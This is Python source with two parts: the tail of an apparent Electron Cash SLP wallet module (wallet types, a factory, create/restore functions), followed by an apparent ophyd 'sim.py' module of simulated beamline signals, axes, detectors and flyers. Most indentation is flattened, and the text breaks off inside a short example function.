return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
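        # Keep generating addresses until the trailing `limit` addresses of the
        # sequence are all unused, i.e. maintain the configured gap of fresh
        # addresses past the last address seen in the history.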
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
        return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
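    # Usage sketch (hypothetical path): Wallet(WalletStorage("/path/to/file"))
    # yields e.g. a Standard_Wallet, Multisig_Wallet or imported-key wallet,
    # depending on the storage's 'wallet_type' field.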
def __new__(self, storage):
# Convert 'bip39-slp' wallet type to 'slp_standard' wallet type
if storage.get('wallet_type', '') == 'bip39-slp' or storage.get('wallet_type', '') == 'standard_slp':
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
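    # Hypothetical usage sketch (seed text and path are placeholders):
    #     d = restore_wallet_from_text("<seed words or master key>",
    #                                  path="/tmp/restored", config=config)
    #     wallet = d['wallet']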
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
    elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
sim.py
|
import copy
import inspect
import itertools
from functools import partial
import numpy as np
import os
import random
import threading
import time as ttime
import uuid
import weakref
import warnings
from collections import deque, OrderedDict
from tempfile import mkdtemp
from .signal import Signal, EpicsSignal, EpicsSignalRO
from .areadetector.base import EpicsSignalWithRBV
from .status import DeviceStatus, StatusBase
from .device import (Device, Component as Cpt,
DynamicDeviceComponent as DDCpt, Kind)
from types import SimpleNamespace
from .pseudopos import (PseudoPositioner, PseudoSingle,
real_position_argument, pseudo_position_argument)
from .positioner import SoftPositioner
from .utils import ReadOnlyError, LimitError
from .log import logger
# two convenience functions 'vendored' from bluesky.utils
def new_uid():
return str(uuid.uuid4())
def short_uid(label=None, truncate=6):
"Return a readable but unique id like 'label-fjfi5a'"
if label:
return '-'.join([label, new_uid()[:truncate]])
else:
return new_uid()[:truncate]
class NullStatus(StatusBase):
"A simple Status object that is always immediately done, successfully."
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.set_finished()
class EnumSignal(Signal):
def __init__(self, *args, value=0, enum_strings, **kwargs):
super().__init__(*args, value=0, **kwargs)
self._enum_strs = tuple(enum_strings)
self._metadata['enum_strs'] = tuple(enum_strings)
self.put(value)
def put(self, value, **kwargs):
if value in self._enum_strs:
value = self._enum_strs.index(value)
elif isinstance(value, str):
err = f'{value} not in enum strs {self._enum_strs}'
raise ValueError(err)
return super().put(value, **kwargs)
def get(self, *, as_string=True, **kwargs):
"""
Implement getting as enum strings
"""
value = super().get()
if as_string:
if self._enum_strs is not None and isinstance(value, int):
return self._enum_strs[value]
elif value is not None:
return str(value)
return value
def describe(self):
desc = super().describe()
desc[self.name]['enum_strs'] = self._enum_strs
return desc
class SynSignal(Signal):
"""
A synthetic Signal that evaluates a Python function when triggered.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal does not change the value.
name : string, keyword only
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
kind : a member the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
# This signature is arranged to mimic the signature of EpicsSignal, where
# the Python function (func) takes the place of the PV.
def __init__(self, func=None, *,
name, # required, keyword-only
exposure_time=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
# When triggered, just put the current value.
func = self.get
# Initialize readback with 0.
self._readback = 0
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self._func = func
self.exposure_time = exposure_time
self.precision = precision
super().__init__(value=self._func(), timestamp=ttime.time(), name=name,
parent=parent, labels=labels, kind=kind, **kwargs)
self._metadata.update(
connected=True,
)
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.precision
return res
def trigger(self):
st = DeviceStatus(device=self)
delay_time = self.exposure_time
if delay_time:
def sleep_and_finish():
self.log.info('sleep_and_finish %s', self)
ttime.sleep(delay_time)
self.put(self._func())
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
self.put(self._func())
st.set_finished()
return st
def sim_set_func(self, func):
"""
Update the SynSignal function to set a new value on trigger.
"""
self._func = func
class SynSignalRO(SynSignal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def put(self, value, *, timestamp=None, force=False):
msg = f"{self}.put(value={value}, timestamp={timestamp}, force={force})"
self.log.error(msg)
raise ReadOnlyError(msg)
def set(self, value, *, timestamp=None, force=False):
msg = f"{self} is readonly"
self.log.error(msg)
raise ReadOnlyError(msg)
class SynPeriodicSignal(SynSignal):
"""
A synthetic Signal that evaluates a Python function periodically.
The signal value is updated in a background thread. To start the thread,
call the `start_simulation()` method before the beginning of simulation.
Parameters
----------
func : callable, optional
This function sets the signal to a new value when it is triggered.
Expected signature: ``f() -> value``.
By default, triggering the signal generates white noise on [0, 1].
name : string, keyword only
period : number, optional
How often the Signal's value is updated in the background. Default is
1 second.
period_jitter : number, optional
Random Gaussian variation of the period. Default is 1 second.
exposure_time : number, optional
Seconds of delay when triggered (simulated 'exposure time'). Default is
0.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
    kind : a member of the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
def __init__(self, func=None, *,
name, # required, keyword-only
period=1, period_jitter=1,
exposure_time=0,
parent=None,
labels=None,
kind=None,
**kwargs):
if func is None:
func = np.random.rand
self._period = period
self._period_jitter = period_jitter
super().__init__(name=name, func=func,
exposure_time=exposure_time,
parent=parent, labels=labels, kind=kind,
**kwargs)
self.__thread = None
def start_simulation(self):
"""
        Start the background thread that performs periodic value updates. This
        method must be called at least once before the simulation begins.
        Subsequent calls are ignored.
"""
if self.__thread is None:
def periodic_update(ref, period, period_jitter):
while True:
signal = ref()
if not signal:
# Our target Signal has been garbage collected. Shut
# down the Thread.
return
signal.put(signal._func())
del signal
# Sleep for period +/- period_jitter.
                    ttime.sleep(
                        max(period + period_jitter * np.random.randn(), 0))
self.__thread = threading.Thread(target=periodic_update,
daemon=True,
args=(weakref.ref(self),
self._period,
self._period_jitter))
self.__thread.start()
def _start_simulation_deprecated(self):
"""Call `start_simulation` and print deprecation warning."""
if self.__thread is None:
msg = ("Deprecated API: Objects of SynPeriodicSignal must be initialized before simulation\n"
"by calling 'start_simulation()' method. Two such objects ('rand' and 'rand2') are\n"
"created by 'ophyd.sim' module. Call\n"
" rand.start_simulation() or rand2.start_simulation()\n"
"before the object is used.")
self.log.warning(msg)
self.start_simulation()
def trigger(self):
self._start_simulation_deprecated()
return super().trigger()
def get(self, **kwargs):
self._start_simulation_deprecated()
return super().get(**kwargs)
def put(self, *args, **kwargs):
self._start_simulation_deprecated()
super().put(*args, **kwargs)
def set(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().set(*args, **kwargs)
def read(self):
self._start_simulation_deprecated()
return super().read()
def subscribe(self, *args, **kwargs):
self._start_simulation_deprecated()
return super().subscribe(*args, **kwargs)
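# A brief hedged sketch of SynPeriodicSignal: the background update thread is
# only spawned once start_simulation() is called (the accessors above fall
# back to the deprecated auto-start path otherwise).
def _periodic_signal_example():
    rand = SynPeriodicSignal(name='rand', period=0.5, period_jitter=0.1)
    rand.start_simulation()  # start the daemon thread that calls put(func())
    return rand.get()        # latest value drawn from np.random.rand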
class _ReadbackSignal(Signal):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._metadata.update(
connected=True,
write_access=False,
)
def get(self):
self._readback = self.parent.sim_state['readback']
return self._readback
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of
# generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['readback_ts']
def put(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
def set(self, value, *, timestamp=None, force=False):
raise ReadOnlyError("The signal {} is readonly.".format(self.name))
class _SetpointSignal(Signal):
def put(self, value, *, timestamp=None, force=False):
self._readback = float(value)
self.parent.set(float(value))
def get(self):
self._readback = self.parent.sim_state['setpoint']
return self.parent.sim_state['setpoint']
def describe(self):
res = super().describe()
# There should be only one key here, but for the sake of generality....
for k in res:
res[k]['precision'] = self.parent.precision
return res
@property
def timestamp(self):
'''Timestamp of the readback value'''
return self.parent.sim_state['setpoint_ts']
class SynAxis(Device):
"""
    A synthetic, settable Device that mimics any 1D axis (position, temperature, etc.).
Parameters
----------
name : string, keyword only
readback_func : callable, optional
When the Device is set to ``x``, its readback will be updated to
``f(x)``. This can be used to introduce random noise or a systematic
offset.
Expected signature: ``f(x) -> value``.
value : object, optional
The initial value. Default is 0.
delay : number, optional
Simulates how long it takes the device to "move". Default is 0 seconds.
precision : integer, optional
Digits of precision. Default is 3.
parent : Device, optional
Used internally if this Signal is made part of a larger Device.
    kind : a member of the Kind IntEnum (or equivalent integer), optional
Default is Kind.normal. See Kind for options.
"""
readback = Cpt(_ReadbackSignal, value=0, kind='hinted')
setpoint = Cpt(_SetpointSignal, value=0, kind='normal')
velocity = Cpt(Signal, value=1, kind='config')
acceleration = Cpt(Signal, value=1, kind='config')
unused = Cpt(Signal, value=1, kind='omitted')
SUB_READBACK = 'readback'
_default_sub = SUB_READBACK
def __init__(self, *,
name,
readback_func=None, value=0, delay=0,
precision=3,
parent=None,
labels=None,
kind=None,
**kwargs):
if readback_func is None:
def readback_func(x):
return x
sentinel = object()
loop = kwargs.pop('loop', sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2
)
self.sim_state = {}
self._readback_func = readback_func
self.delay = delay
self.precision = precision
# initialize values
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.sim_state['readback'] = readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
super().__init__(name=name, parent=parent, labels=labels, kind=kind,
**kwargs)
self.readback.name = self.name
def set(self, value):
old_setpoint = self.sim_state['setpoint']
self.sim_state['setpoint'] = value
self.sim_state['setpoint_ts'] = ttime.time()
self.setpoint._run_subs(sub_type=self.setpoint.SUB_VALUE,
old_value=old_setpoint,
value=self.sim_state['setpoint'],
timestamp=self.sim_state['setpoint_ts'])
def update_state():
old_readback = self.sim_state['readback']
self.sim_state['readback'] = self._readback_func(value)
self.sim_state['readback_ts'] = ttime.time()
self.readback._run_subs(sub_type=self.readback.SUB_VALUE,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
self._run_subs(sub_type=self.SUB_READBACK,
old_value=old_readback,
value=self.sim_state['readback'],
timestamp=self.sim_state['readback_ts'])
st = DeviceStatus(device=self)
if self.delay:
def sleep_and_finish():
ttime.sleep(self.delay)
update_state()
st.set_finished()
threading.Thread(target=sleep_and_finish, daemon=True).start()
else:
update_state()
st.set_finished()
return st
@property
def position(self):
return self.readback.get()
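# A brief hedged sketch of moving a SynAxis: set() returns a status object
# that completes after the simulated delay, and ``position`` reflects
# readback_func(setpoint).
def _syn_axis_example():
    motor = SynAxis(name='motor', delay=0)
    motor.set(1.5).wait()  # finishes immediately because delay=0
    return motor.position  # 1.5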
class SynAxisEmptyHints(SynAxis):
@property
def hints(self):
return {}
class SynAxisNoHints(SynAxis):
readback = Cpt(_ReadbackSignal, value=0, kind='omitted')
@property
def hints(self):
raise AttributeError
class SynGauss(Device):
"""
Evaluate a point on a Gaussian based on the value of a motor.
Parameters
----------
name : string
motor : Device
motor_field : string
center : number
center of peak
Imax : number
max intensity of peak
sigma : number, optional
Default is 1.
noise : {'poisson', 'uniform', None}, optional
Add noise to the gaussian peak.
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
random_state : numpy random state object, optional
        e.g. np.random.RandomState(0), to generate random numbers with a given seed
Example
-------
motor = SynAxis(name='motor')
det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
"""
def _compute(self):
m = self._motor.read()[self._motor_field]['value']
# we need to do this one at a time because
# - self.read() may be screwed with by the user
# - self.get() would cause infinite recursion
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-(m - center) ** 2 /
(2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def __init__(self, name, motor, motor_field, center, Imax,
*, random_state=None,
**kwargs):
set_later = {}
for k in ('sigma', 'noise', 'noise_multiplier'):
v = kwargs.pop(k, None)
if v is not None:
set_later[k] = v
super().__init__(name=name, **kwargs)
self._motor = motor
self._motor_field = motor_field
self.center.put(center)
self.Imax.put(Imax)
self.random_state = random_state or np.random
self.val.name = self.name
self.val.sim_set_func(self._compute)
for k, v in set_later.items():
getattr(self, k).put(v)
self.trigger()
def subscribe(self, *args, **kwargs):
return self.val.subscribe(*args, **kwargs)
def clear_sub(self, cb, event_type=None):
return self.val.clear_sub(cb, event_type=event_type)
def unsubscribe(self, cid):
return self.val.unsubscribe(cid)
def unsubscribe_all(self):
return self.val.unsubscribe_all()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
@property
def precision(self):
return self.val.precision
@precision.setter
def precision(self, v):
self.val.precision = v
@property
def exposure_time(self):
return self.val.exposure_time
@exposure_time.setter
def exposure_time(self, v):
self.val.exposure_time = v
class Syn2DGauss(Device):
"""
    Evaluate a point on a 2D Gaussian based on the values of two motors.
Parameters
----------
name : str
The name of the detector
motor0 : SynAxis
The 'x' coordinate of the 2-D gaussian blob
motor_field0 : str
The name field of the motor. Should be the key in motor0.describe()
motor1 : SynAxis
The 'y' coordinate of the 2-D gaussian blob
motor_field1 : str
The name field of the motor. Should be the key in motor1.describe()
center : iterable, optional
The center of the gaussian blob
Defaults to (0,0)
Imax : float, optional
The intensity at `center`
Defaults to 1
sigma : float, optional
Standard deviation for gaussian blob
Defaults to 1
noise : {'poisson', 'uniform', None}, optional
        Add noise to the gaussian peak.
Defaults to None
noise_multiplier : float, optional
Only relevant for 'uniform' noise. Multiply the random amount of
noise by 'noise_multiplier'
Defaults to 1
    random_state : numpy random state object, optional
        e.g. np.random.RandomState(0), to generate random numbers with a given seed
    Example
    -------
    motor1 = SynAxis(name='motor1')
    motor2 = SynAxis(name='motor2')
    det = Syn2DGauss('det', motor1, 'motor1', motor2, 'motor2',
                     center=(0, 0), Imax=1)
"""
val = Cpt(SynSignal, kind='hinted')
Imax = Cpt(Signal, value=10, kind='config')
center = Cpt(Signal, value=0, kind='config')
sigma = Cpt(Signal, value=1, kind='config')
noise = Cpt(EnumSignal, value='none', kind='config',
enum_strings=('none', 'poisson', 'uniform'))
noise_multiplier = Cpt(Signal, value=1, kind='config')
def _compute(self):
x = self._motor0.read()[self._motor_field0]['value']
y = self._motor1.read()[self._motor_field1]['value']
m = np.array([x, y])
Imax = self.Imax.get()
center = self.center.get()
sigma = self.sigma.get()
noise = self.noise.get()
noise_multiplier = self.noise_multiplier.get()
v = Imax * np.exp(-np.sum((m - center) ** 2) / (2 * sigma ** 2))
if noise == 'poisson':
v = int(self.random_state.poisson(np.round(v), 1))
elif noise == 'uniform':
v += self.random_state.uniform(-1, 1) * noise_multiplier
return v
def __init__(self, name, motor0, motor_field0, motor1, motor_field1,
center, Imax, sigma=1, noise="none", noise_multiplier=1,
random_state=None, **kwargs):
super().__init__(name=name, **kwargs)
self._motor0 = motor0
self._motor1 = motor1
self._motor_field0 = motor_field0
self._motor_field1 = motor_field1
self.center.put(center)
self.Imax.put(Imax)
self.sigma.put(sigma)
self.noise.put(noise)
self.noise_multiplier.put(noise_multiplier)
if random_state is None:
random_state = np.random
self.random_state = random_state
self.val.name = self.name
self.val.sim_set_func(self._compute)
self.trigger()
def trigger(self, *args, **kwargs):
return self.val.trigger(*args, **kwargs)
class TrivialFlyer:
"""Trivial flyer that complies to the API but returns empty data."""
name = 'trivial_flyer'
parent = None
def kickoff(self):
return NullStatus()
def describe_collect(self):
return {'stream_name': {}}
def read_configuration(self):
return OrderedDict()
def describe_configuration(self):
return OrderedDict()
def complete(self):
return NullStatus()
def collect(self):
for i in range(100):
yield {'data': {}, 'timestamps': {}, 'time': i, 'seq_num': i}
def stop(self, *, success=False):
pass
class NewTrivialFlyer(TrivialFlyer):
"""
The old-style API inserted Resource and Datum documents into a database
directly. The new-style API only caches the documents and provides an
interface (collect_asset_docs) for accessing that cache. This change was
part of the "asset refactor" that changed that way Resource and Datum
documents flowed through ophyd, bluesky, and databroker. Trivial flyer that
complies to the API but returns empty data.
"""
name = 'new_trivial_flyer'
def collect_asset_docs(self):
for _ in ():
yield _
class MockFlyer:
"""
Class for mocking a flyscan API implemented with stepper motors.
"""
def __init__(self, name, detector, motor, start, stop, num, **kwargs):
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = np.linspace(start, stop, num)
self._data = deque()
self._completion_status = None
self._lock = threading.RLock()
sentinel = object()
loop = kwargs.pop("loop", sentinel)
if loop is not sentinel:
warnings.warn(
f"{self.__class__} no longer takes a loop as input. "
"Your input will be ignored and may raise in the future",
stacklevel=2,
)
if kwargs:
raise TypeError(
f"{self.__class__}.__init__ got unexpected "
f"keyword arguments {list(kwargs)}"
)
def __setstate__(self, val):
name, detector, motor, steps = val
self.name = name
self.parent = None
self._mot = motor
self._detector = detector
self._steps = steps
self._completion_status = None
def __getstate__(self):
return (self.name, self._detector, self._mot, self._steps)
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe_collect(self):
dd = dict()
dd.update(self._mot.describe())
dd.update(self._detector.describe())
return {self.name: dd}
def complete(self):
if self._completion_status is None:
raise RuntimeError("No collection in progress")
return self._completion_status
def kickoff(self):
if self._completion_status is not None and not self._completion_status.done:
raise RuntimeError("Kicking off a second time?!")
self._data = deque()
st = DeviceStatus(device=self)
self._completion_status = st
def flyer_worker():
self._scan()
st.set_finished()
threading.Thread(target=flyer_worker, daemon=True).start()
kickoff_st = DeviceStatus(device=self)
kickoff_st.set_finished()
return kickoff_st
def collect(self):
with self._lock:
data = list(self._data)
self._data.clear()
yield from data
def _scan(self):
"This will be run on a separate thread, started in self.kickoff()"
ttime.sleep(0.1)
for p in self._steps:
stat = self._mot.set(p)
stat.wait()
stat = self._detector.trigger()
stat.wait()
event = dict()
event["time"] = ttime.time()
event["data"] = dict()
event["timestamps"] = dict()
for r in [self._mot, self._detector]:
d = r.read()
for k, v in d.items():
event["data"][k] = v["value"]
event["timestamps"][k] = v["timestamp"]
with self._lock:
self._data.append(event)
def stop(self, *, success=False):
pass
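# A brief hedged sketch of the flyer protocol as exercised by MockFlyer:
# kickoff() starts the background step scan, complete() reports when it has
# finished, and collect() yields the cached event dictionaries. Assumes the
# status objects expose ``wait()``.
def _mock_flyer_example():
    motor = SynAxis(name='motor')
    det = SynGauss('det', motor, 'motor', center=0, Imax=1, sigma=1)
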